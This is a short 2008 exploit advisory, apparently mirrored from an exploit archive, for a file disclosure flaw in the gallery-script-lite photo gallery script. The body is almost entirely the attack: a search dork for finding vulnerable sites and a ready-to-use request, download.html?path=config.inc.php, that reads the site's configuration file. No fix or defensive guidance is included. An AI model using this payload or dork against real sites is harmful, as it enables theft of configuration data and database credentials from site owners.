id: 2859
date: 04/08/2008
title: Free Photo Gallery Site Script (path) File Disclosure Vulnerability
author: JiKo
cves: 

===================================================================
Free Photo Gallery Site Script (path) File Disclosure Vulnerability
===================================================================




-------------------------------------------------------------------------
  --          JIKI Team [ JIKO + KIl1er ]        ---
-------------------------------------------------------------------------
# Author  : jiko
# Script  : gallery-script-lite
# Bug   : Remote  Local File Inclusion Vulnerability
# Download  : http://www.arwscripts.com/gallery-script-lite.html
# Dork  : developed by ARWScripts.com
# file  : download.html
# Error  :

=========================JIkI Team===================
# Exploit  :
 
  http://[site]/[script]/download.html?path=
#ex   :
 download.html?path=config.inc.php
http://www.xxx.com/demos/galleryscriptlite/download.html?path=config.inc.php
===========




#  0day.today [2023-03-25]  #